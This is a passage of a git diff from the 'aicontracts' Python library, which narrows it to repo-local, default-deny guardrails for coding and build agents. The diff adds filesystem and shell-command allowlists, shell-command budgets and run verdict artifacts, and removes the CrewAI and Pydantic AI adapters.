outputs: schema: type: object - required: - - priority - - category + required: [priority, category] properties: + ticket_id: + type: string + subject: + type: string + body: + type: string priority: type: string enum: ["critical", "high", "medium", "low"] @@ -92,14 +63,6 @@ outputs: type: string routed_to: type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: @@ -109,7 +72,6 @@ effects: - ticket_database.assign - customer_lookup - knowledge_base.search - - notification.send_team network: - "https://api.ticketing.internal/*" - "https://api.customers.internal/*" @@ -143,77 +105,15 @@ failure_model: errors: - name: ticket_not_found retryable: false - description: The referenced ticket does not exist. - - name: database_timeout retryable: true max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent observability: traces: enabled: true sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. 
- violation_events: emit: true destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/pyproject.toml b/pyproject.toml index d54a0ed..57ed7c2 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,7 +5,7 @@ build-backend = "hatchling.build" [project] name = "aicontracts" dynamic = ["version"] -description = "YAML spec + validation SDK for production agent reliability — cost control, tool-use security, and audit trails." +description = "Repo-local, fail-closed guardrails for autonomous coding/build agents." readme = "README.md" license = "Apache-2.0" requires-python = ">=3.9" @@ -25,9 +25,8 @@ classifiers = [ "Typing :: Typed", ] keywords = [ - "agent", "contracts", "llm", "safety", "validation", "mcp", - "ai-agents", "guardrails", "governance", "compliance", "observability", - "opentelemetry", "budget", "cost-control", "tool-use", "audit", + "agent", "contracts", "coding-agent", "build-agent", "guardrails", "repo-local", + "fail-closed", "budgets", "tool-use", "filesystem", "shell", "ci", ] dependencies = [ "pyyaml>=6.0", @@ -37,16 +36,12 @@ dependencies = [ [project.optional-dependencies] otel = ["opentelemetry-api>=1.20"] -langchain = ["langchain-core>=0.2"] -crewai = ["crewai>=0.50"] -pydantic-ai = ["pydantic-ai>=0.1"] -openai = ["openai-agents==0.8.4"] -claude = ["claude-agent-sdk==0.1.50; python_version>='3.10'"] +langchain = ["langchain-core==1.2.26; python_version>='3.10'"] +openai = ["openai-agents==0.13.5; python_version>='3.10'"] +claude = ["claude-agent-sdk==0.1.56; python_version>='3.10'"] all = [ "aicontracts[otel]", "aicontracts[langchain]", -
"aicontracts[crewai]", - "aicontracts[pydantic-ai]", "aicontracts[openai]", "aicontracts[claude]", ] @@ -96,3 +91,30 @@ python_version = "3.9" strict = true warn_return_any = true warn_unused_configs = true + +[[tool.mypy.overrides]] +module = [ + "yaml", + "jsonschema", + "jsonschema.*", + "opentelemetry", + "opentelemetry.*", +] +ignore_missing_imports = true + +# Framework SDKs may use newer-Python syntax (e.g. match statements) than +# the project's mypy target. Skip following imports into them; mypy then +# treats names imported from these packages as Any in the adapter modules. +[[tool.mypy.overrides]] +module = [ + "agents", + "agents.*", + "langchain_core", + "langchain_core.*", + "claude_agent_sdk", + "claude_agent_sdk.*", + "mcp", + "mcp.*", +] +ignore_missing_imports = true +follow_imports = "skip" diff --git a/schemas/agent-contract.schema.json b/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/schemas/agent-contract.schema.json +++ b/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers."
} } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." }, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. 
Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." 
} } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." } } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." 
}, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." } } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." 
+ } + } } } } diff --git a/spec/SPECIFICATION.md b/spec/SPECIFICATION.md index a4cd901..87a3b23 100644 --- a/spec/SPECIFICATION.md +++ b/spec/SPECIFICATION.md @@ -2,258 +2,199 @@ ## Overview -An Agent Contract is a YAML document that declares what an agent **must do**, -**must not do**, and **what happens when it fails**. Contracts are enforced -at the runtime boundary by the SDK — never via prompts. +An Agent Contract is a repo-local YAML document that declares what an autonomous coding/build agent may do, what it must prove before a run is considered successful, and where the final verdict artifact should be written. -Contracts follow the **OpenAPI model**: a machine-readable document that -generates tooling leverage. Write a YAML file. Get cost control, tool-use -security, and audit trails. +The v0.1.0 surface is intentionally narrow: -## File Format +- authorize reads, writes, commands, tools, network, and state writes +- enforce resource budgets +- evaluate postconditions against outputs and recorded checks +- emit one durable verdict artifact for each run -Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. The SDK -also accepts any `.yaml` or `.yml` file. A JSON Schema is provided at -`schemas/agent-contract.schema.json` for editor support and machine validation. +## Core principles -### Forward Compatibility +1. **Repo-local first** — the contract belongs in the repository. +2. **Fail closed when configured** — coding/build scopes default to deny when present. +3. **One operator-readable verdict** — every meaningful run can end with one artifact. +4. **Host-agnostic core** — the contract is portable across local runtimes and CI. -- Unknown fields are **ignored** (must-ignore semantics) -- Extension fields use the `x-` prefix (e.g., `x-hipaa-compliance: true`) -- Spec version (`agent_contract` field) follows semver +## File format ---- +Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. 
+Unknown fields are ignored for forward compatibility. Extension fields use the `x-` prefix. -## Three Tiers - -Contracts use graduated tiers. Start simple, add guarantees as production demands. - -### Tier 0: Standalone (4 fields) - -**Purpose:** Self-documentation + local validation. Value without any runtime. - -| Field | Type | Required | Description | -|-------|------|----------|-------------| -| `agent_contract` | semver string | Yes | Spec version (e.g., `"0.1.0"`) | -| `identity.name` | string | Yes | Unique agent identifier | -| `identity.version` | semver string | Yes | Agent implementation version | -| `contract.postconditions[]` | array (min 1) | Yes | Machine-checkable output guarantees | - -A Tier 0 contract is useful on its own: it documents what the agent guarantees -and can be validated locally with `aicontracts validate`. - -### Tier 1: Enforceable (adds runtime value) - -Everything in Tier 0, plus: - -| Field | What It Solves | -|-------|---------------| -| `inputs.schema` | Reject malformed inputs before execution (JSON Schema) | -| `outputs.schema` | Validate structured output, catch schema drift (JSON Schema) | -| `effects.authorized` | Default-deny tool allowlist + network + state writes | -| `resources.budgets` | `max_cost_usd`, `max_tokens`, `max_tool_calls`, `max_duration_seconds` | - -The SDK enforces Tier 1 fields at the boundary: input validation, tool gating, -budget circuit breakers, and output validation. 
- -### Tier 2: Composable (adds multi-agent + compliance value) - -Everything in Tier 1, plus: +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: produces_output + check: "output is not None" +``` -| Field | What It Solves | -|-------|---------------| -| `failure_model` | Typed errors with retry/fallback semantics | -| `effects.declared` | Effect footprint for audit trails (composes via union) | -| `delegation` | Max depth, attenuation rules, sub-agent requirements | -| `observability` | Required OTel spans/events + violation event schema | -| `versioning` | Content-addressed build ID + breaking change rules | -| `slo` | Target rates for contract satisfaction, latency, cost | +## Tiers ---- +### Tier 0 — Standalone -## Field Reference +Required fields: -### `agent_contract` (required) +- `agent_contract` +- `identity.name` +- `identity.version` +- `contract.postconditions[]` -```yaml -agent_contract: "0.1.0" -``` +### Tier 1 — Enforceable -Spec version. Enables forward compatibility. +Adds runtime enforcement value: -### `identity` (required) +- `inputs.schema` +- `outputs.schema` +- `effects.authorized` +- `resources.budgets` -```yaml -identity: - name: support-triage-agent - version: "2.1.0" - description: Triages support tickets by priority. - authors: - - Piyush Vyas -``` +Tier 1 is where coding/build guardrails live. -### `contract.postconditions` (required, min 1) +### Tier 2 — Composable -```yaml -contract: - postconditions: - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' - enforcement: sync_block # sync_block | sync_warn | async_monitor - severity: critical # critical | major | minor - description: Priority must be valid. 
- slo: - target_rate: 0.995 - window: "24h" -``` +Adds broader composition and observability features: -**Enforcement timing:** -- `sync_block`: Fails the invocation if the check fails -- `sync_warn`: Logs a warning, emits a violation event, but allows the result -- `async_monitor`: Deferred evaluation (e.g., LLM-as-judge quality checks) +- `failure_model` +- `effects.declared` +- `delegation` +- `observability` +- `versioning` +- `slo` -**Check syntax:** CEL-like expressions evaluated safely (no `eval()`): -- `output is not None` -- `output.status == "resolved"` -- `output.status in ["resolved", "escalated"]` -- `len(output.items) > 0` -- `output.score >= 0.8` -- `eval:judge` (LLM-as-judge, async only in v0.1) +## Authorized effects -### `effects` (Tier 1+) +`effects.authorized` declares what the agent may do. ```yaml effects: - authorized: # Capability scope — what the agent MAY do + authorized: tools: - search - - database.* # Glob patterns supported network: - "https://api.example.com/*" state_writes: - "tickets.*" - - declared: # Effect footprint — what actually happens (Tier 2) - tools: - - search - network: - - "https://api.example.com/search" - state_writes: - - "tickets.priority" + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" ``` -**Key rules:** -- `effects.authorized` is **default-deny**: tools not listed are blocked -- During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` +Rules: + +- tools, network, and state writes are default-deny when configured +- filesystem read/write scopes are default-deny when configured +- shell commands are matched against normalized command strings with glob patterns +- during delegation, authorized effects attenuate by intersection -### `resources.budgets` (Tier 
1+) +## Budgets ```yaml resources: budgets: - max_cost_usd: 0.50 - max_tokens: 15000 + max_cost_usd: 1.00 + max_tokens: 50000 max_tool_calls: 20 - max_duration_seconds: 30.0 + max_shell_commands: 10 + max_duration_seconds: 1800 ``` -Per-invocation limits. The SDK trips a circuit breaker when any threshold is exceeded. +`max_shell_commands` is specific to coding/build workflows and complements tool-call budgets. -### `failure_model` (Tier 2) +## Postconditions and recorded checks + +Postconditions are safe expression checks evaluated against `output` plus any extra context provided by the runtime. ```yaml -failure_model: - errors: - - name: timeout - retryable: true - max_retries: 3 - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - default_timeout_seconds: 30.0 - circuit_breaker: - failure_threshold: 5 - reset_timeout_seconds: 60.0 +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical ``` -### `delegation` (Tier 2) +Supported expression forms include: -```yaml -delegation: - max_depth: 2 - attenuate_effects: true # Intersect authorized effects during delegation - require_contract: true # Sub-agents must have their own contract - allowed_agents: - - cache-agent - - summarizer -``` +- `output is not None` +- `output.status == "ok"` +- `output.status in ["ok", "warn"]` +- `len(output.items) > 0` +- `checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0` -### `observability` (Tier 2) +## Observability and verdict artifacts ```yaml observability: - traces: - enabled: true - sample_rate: 1.0 - metrics: - - name: latency_ms - type: histogram - violation_events: - emit: true - destination: otel # stdout | otel | callback + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" ``` -### `versioning` (Tier 2) +The path may contain `{run_id}`. 
+If omitted, runtimes may default to `.agent-contracts/runs/{run_id}/verdict.json`. -```yaml -versioning: - build_id: "sha256:abc123..." - breaking_changes: [] - substitution: - compatible_with: - - "1.0.0" -``` +Verdict artifacts include: -### `slo` (Tier 2) +- contract identity + spec version +- host identity +- `outcome`: `pass | warn | blocked | fail` +- `final_gate`: `allowed | blocked | failed` +- violations +- executed checks +- budget snapshot +- artifact metadata -```yaml -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - latency: - p50_ms: 500 - p99_ms: 5000 - cost: - avg_usd: 0.10 - p99_usd: 0.50 - error_budget_policy: freeze_deployments -``` +## Outcome semantics ---- +- `pass` — required checks and blocking clauses passed +- `warn` — non-blocking warnings were recorded +- `blocked` — an effect or budget violation denied the run in-flight +- `fail` — the run completed, but required checks or critical postconditions failed -## Breaking Change Rules +## Example coding-agent contract -For the v0.x series: -- Adding optional fields is **not** a breaking change -- Removing or renaming fields **is** a breaking change -- Changing field semantics **is** a breaking change -- Adding new required fields **is** a breaking change +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" +resources: + budgets: + max_shell_commands: 10 +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" +``` -From v1.0 onward: no breaking changes within a major version. 
+## Compatibility notes ---- +Within v0.1.0: -## Positioning +- adding optional fields is backward-compatible +- removing fields is breaking +- changing field semantics is breaking +- new required fields are breaking -| Layer | What It Does | What Contracts Add | -|-------|-------------|-------------------| -| **MCP** | Tool transport (JSON-RPC) | Policy layer above transport | -| **Agent Skills** | Capability discovery (Markdown) | Machine-enforceable guarantees | -| **A2A** | Agent discovery and routing | Behavioral guarantees on routes | -| **AWS AgentCore** | Cedar policy enforcement | Portable, open spec | -| **LangChain/CrewAI** | Agent orchestration | Declarative, out-of-process enforcement | -| **OpenAPI** | Structural API contracts | Behavioral contracts for non-deterministic agents | +This repo intentionally does **not** use v0.1.0 to broaden into hosted policy platforms or generic agent governance. diff --git a/src/agent_contracts/__init__.py b/src/agent_contracts/__init__.py index 7a9bd09..0f0f427 100644 --- a/src/agent_contracts/__init__.py +++ b/src/agent_contracts/__init__.py @@ -1,4 +1,4 @@ -"""Agent Contracts — YAML spec + validation SDK for production agent reliability. +"""Agent Contracts — repo-local contracts for coding/build agents. 
Quick start: from agent_contracts import load_contract, ContractEnforcer @@ -6,15 +6,23 @@ contract = load_contract("AGENT_CONTRACT.yaml") with ContractEnforcer(contract) as enforcer: enforcer.check_tool_call("search") - enforcer.add_cost(0.05) + enforcer.check_file_write("src/app.py") + enforcer.check_shell_command("python -m pytest tests/") enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) """ from agent_contracts._version import __version__ from agent_contracts.budgets import BudgetExceededError, BudgetTracker from agent_contracts.composition import CompatibilityReport, check_compatibility from agent_contracts.effects import EffectDeniedError, EffectGuard -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + RunCheckResult, + RunVerdict, + enforce_contract, +) from agent_contracts.loader import ContractLoadError, load_contract, validate_contract from agent_contracts.postconditions import PostconditionError, PreconditionError from agent_contracts.tier import TierRecommendation, assess_tier, recommend_upgrades @@ -25,10 +33,12 @@ EffectsAuthorized, EffectsDeclared, FailureModel, + FilesystemAuthorization, ObservabilityConfig, PostconditionDef, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, VersioningConfig, ) @@ -36,44 +46,39 @@ __all__ = [ "__version__", - # Core types "Contract", "ContractIdentity", "PostconditionDef", "PreconditionDef", "EffectsAuthorized", "EffectsDeclared", + "FilesystemAuthorization", + "ShellAuthorization", "ResourceBudgets", "DelegationRules", "FailureModel", "ObservabilityConfig", "VersioningConfig", "SLOConfig", - # Loading "load_contract", "validate_contract", "ContractLoadError", - # Tier "assess_tier", "recommend_upgrades", "TierRecommendation", - # Enforcement "ContractEnforcer", "ContractViolation", + "RunCheckResult", + "RunVerdict", "enforce_contract", - # 
Effects "EffectGuard", "EffectDeniedError", - # Budgets "BudgetTracker", "BudgetExceededError", - # Postconditions "PostconditionError", "PreconditionError", - # Violations "ViolationEvent", "ViolationEmitter", - # Composition "check_compatibility", "CompatibilityReport", ] diff --git a/src/agent_contracts/_version.py b/src/agent_contracts/_version.py index 3cd27c7..ce692bc 100644 --- a/src/agent_contracts/_version.py +++ b/src/agent_contracts/_version.py @@ -1,3 +1,3 @@ """Agent Contracts version.""" -__version__ = "0.1.1" +__version__ = "0.2.0" diff --git a/src/agent_contracts/adapters/__init__.py b/src/agent_contracts/adapters/__init__.py index cd5e596..c930a39 100644 --- a/src/agent_contracts/adapters/__init__.py +++ b/src/agent_contracts/adapters/__init__.py @@ -1,12 +1,11 @@ """Framework adapters for Agent Contracts. -Each adapter is a thin wrapper (<200 LOC) that maps framework-specific -hooks to the SDK's enforcement API. Install the corresponding extra -to use an adapter: +The contract, CLI, verdict artifact, and GitHub Action are framework- +agnostic by design — these adapters are optional ergonomic helpers that +forward in-runtime hook calls into the same enforcer. The CI verdict +gate is the source of truth. - pip install aicontracts[langchain] - pip install aicontracts[crewai] - pip install aicontracts[pydantic-ai] - pip install aicontracts[openai] pip install aicontracts[claude] # Python 3.10+ + pip install aicontracts[openai] + pip install aicontracts[langchain] """ diff --git a/src/agent_contracts/adapters/claude_agent.py b/src/agent_contracts/adapters/claude_agent.py index 688b419..e6b6e0a 100644 --- a/src/agent_contracts/adapters/claude_agent.py +++ b/src/agent_contracts/adapters/claude_agent.py @@ -1,4 +1,4 @@ -"""Claude Agent SDK adapter — contract enforcement via hooks. +"""Claude Agent SDK adapter — repo-local contract enforcement via hooks. 
Usage (3 lines): from agent_contracts.adapters.claude_agent import ContractHooks diff --git a/src/agent_contracts/adapters/crewai.py b/src/agent_contracts/adapters/crewai.py deleted file mode 100644 index 79b178a..0000000 --- a/src/agent_contracts/adapters/crewai.py +++ /dev/null @@ -1,105 +0,0 @@ -"""CrewAI adapter — contract enforcement for CrewAI agents and crews. - -Usage (3 lines): - from agent_contracts.adapters.crewai import ContractGuard - guard = ContractGuard.from_file("contract.yaml") - result = guard.execute(crew, inputs={"query": "..."}) -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractGuard: - """Wraps a CrewAI crew or agent with contract enforcement. - - Provides pre-execution input validation, tool call interception, - and post-execution output validation with postconditions. 
- """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractGuard": - """Create a guard from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def validate_inputs(self, inputs: Dict[str, Any]) -> List[str]: - """Validate inputs before crew execution.""" - return self._enforcer.validate_input(inputs) - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - self._enforcer.check_tool_call(tool_name) - - def validate_output(self, output: Any) -> List[str]: - """Validate output after crew execution.""" - errors = self._enforcer.validate_output(output) - self._enforcer.evaluate_postconditions(output) - return errors - - def execute(self, crew: Any, *, inputs: Optional[Dict[str, Any]] = None) -> Any: - """Execute a crew with contract enforcement. - - Validates inputs before execution and outputs/postconditions after. 
- """ - if inputs is not None: - input_errors = self.validate_inputs(inputs) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute the crew - result = crew.kickoff(inputs=inputs) - - # Post-execution validation - output = result if not hasattr(result, "raw") else result.raw - self._enforcer.validate_output(output if isinstance(output, dict) else {"result": output}) - self._enforcer.evaluate_postconditions(output) - - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/src/agent_contracts/adapters/openai_agents.py b/src/agent_contracts/adapters/openai_agents.py index fad45d0..bba28ff 100644 --- a/src/agent_contracts/adapters/openai_agents.py +++ b/src/agent_contracts/adapters/openai_agents.py @@ -1,4 +1,4 @@ -"""OpenAI Agents SDK adapter — contract enforcement via RunHooks. +"""OpenAI Agents SDK adapter — repo-local contract enforcement via RunHooks. Usage (3 lines): from agent_contracts.adapters.openai_agents import ContractRunHooks @@ -23,7 +23,7 @@ from agent_contracts.violations import ViolationEvent try: - from openai_agents import RunHooks + from agents import RunHooks except ImportError: # Stub so the module can be imported without openai-agents class RunHooks: # type: ignore[no-redef] diff --git a/src/agent_contracts/adapters/pydantic_ai.py b/src/agent_contracts/adapters/pydantic_ai.py deleted file mode 100644 index 442ca72..0000000 --- a/src/agent_contracts/adapters/pydantic_ai.py +++ /dev/null @@ -1,121 +0,0 @@ -"""Pydantic AI adapter — contract enforcement for Pydantic AI agents. 
- -Usage (3 lines): - from agent_contracts.adapters.pydantic_ai import ContractMiddleware - middleware = ContractMiddleware.from_file("contract.yaml") - result = await middleware.run(agent, "user prompt") -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractMiddleware: - """Middleware that wraps Pydantic AI agent execution with contract enforcement. - - Intercepts tool calls for effect gating, tracks budgets, - and validates outputs against the contract schema and postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractMiddleware": - """Create middleware from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - self._enforcer.check_tool_call(tool_name) - - def validate_result(self, result: Any) -> List[str]: - """Validate agent result against contract.""" 
